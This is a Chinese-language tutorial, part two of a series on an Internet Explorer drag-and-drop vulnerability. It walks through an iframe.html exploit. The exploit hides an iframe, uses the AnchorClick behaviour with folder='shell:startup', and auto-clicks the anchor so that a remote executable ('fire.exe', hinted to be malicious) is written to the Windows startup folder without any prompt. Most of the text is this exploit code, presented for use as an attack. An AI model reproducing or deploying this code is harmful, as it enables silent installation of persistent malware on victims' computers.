IE拖放漏洞详解二

第二个要利用的漏洞就是在IE中显示一个本地的目录，当然这里的显示不是说要让人看见，而是要让机器能看见。并且当下面a元素的folder属性为目录或是shell:startup时以及a元素支持anchorclick行为时，就可以在网页的ifram中显示目录并且可以将远程文件在没有任何提示的情况下写到这个目录中，为了不要让人看见他的目录显示在了网页中，我们还有把iframe放在div中，将其属性设为HIDDEN
+-----------------------------------iframe.html Code---------------------------+
<html>
<head>
<style>
a {
    behavior:url(#default#AnchorClick);
}
<!--关键，定义a元素的行为，让动作的执行不会有任何的提示-->
</style>
</head>
<body >

<img id="dyn" dynsrc="fire.exe" >
<!--这里这个fire.exe你应该知道是什么吧-->
<div>
    <iframe name="clientframe" id="clientframe" style="position:absolute;width:200px;height:200px;"></iframe>
</div>

<a folder="shell:startup"  id="clientcall" target="clientframe"></a>
<!--shell:startup就是启动目录，你可以在浏览器的窗口输入shell:startup看看-->
<script language="JavaScript" type="text/javascript">
document.getElementById("clientcall").click()
<!--关键字 getElementById,获取对 ID 标签属性为指定值的第一个对象的引用-->
#######################    举例   #########################################
<button onclick='alert(document.getElementById("a").outerHTML)'>访问a</button>
<img name=a>
<img name=a src='c'>
##########################################################################
</script>
</body>
</html>

+----------------------------------end--------------------------------------+